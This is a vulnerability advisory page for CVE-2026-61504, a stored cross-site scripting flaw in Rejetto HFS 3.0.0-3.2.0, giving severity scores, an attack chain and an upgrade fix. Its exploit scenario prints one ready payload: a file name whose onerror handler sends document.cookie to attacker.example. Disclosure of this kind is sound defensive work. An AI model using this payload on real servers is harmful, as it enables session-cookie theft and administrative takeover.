Skip to main content

Rejetto HFS CVE-2026-61504

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-13 VulnCheck
5.1
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

Network-reachable stored XSS needing low-privilege upload access and victim interaction; scope changes to third-party browser sessions with low confidentiality and integrity impact, no availability effect.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jul 13, 2026 - 19:43 vuln.today
Analysis Generated
Jul 13, 2026 - 19:43 vuln.today

DescriptionCVE.org

Rejetto HFS 3.0.0 through 3.2.0 does not escape file names in its fallback "basic" web listing, and this listing can be forced by any browser via the ?get=basic parameter. A user with upload permission - or an anonymous user on servers with an open upload folder - can store a file whose name contains script that executes in the browser of anyone viewing the listing.

AnalysisAI

Stored XSS in Rejetto HFS 3.0.0 through 3.2.0 allows attackers with upload access - or any user on servers configured with publicly writable folders - to inject persistent browser scripts via maliciously named files in the 'basic' web listing mode. Because the basic listing can be forced by any visitor using the ?get=basic URL parameter, the vulnerable rendering path is reachable regardless of whether the default interface is exposed. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain upload access or identify open upload folder
Delivery
Upload file with XSS payload embedded in filename
Exploit
Craft directory URL with ?get=basic appended
Execution
Deliver link to target victim (e.g., admin)
Persist
Victim browser loads unescaped filename as HTML
Impact
Steal session cookie or escalate to admin

Vulnerability AssessmentAI

Exploitation Two conditions must be met: first, the attacker must be able to place a file with an arbitrary name on the HFS server - either via a low-privileged authenticated account with upload permission, or via a directory configured to allow anonymous uploads (a common deployment pattern for public-facing HFS shares). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 base score of 5.1 (AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N) reflects a moderate baseline: network-accessible with low complexity, but gated by upload privilege (PR:L) and victim interaction (UI:P). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker targeting an HFS instance with an open upload folder uploads a file named something like '<img src=x onerror=fetch("https://attacker.example/c?"+document.cookie)>.txt', storing a persistent XSS payload at no cost. The attacker then sends an administrator a crafted link to the affected directory with ?get=basic appended; when the admin opens the link, their session cookie is exfiltrated, granting the attacker administrative control over the HFS instance. …
Remediation Upgrade to Rejetto HFS v3.2.1 immediately, as this release addresses this stored XSS and multiple co-reported vulnerabilities that collectively enable administrative access; the patch is available at https://github.com/rejetto/hfs/releases/tag/v3.2.1. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-61504 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy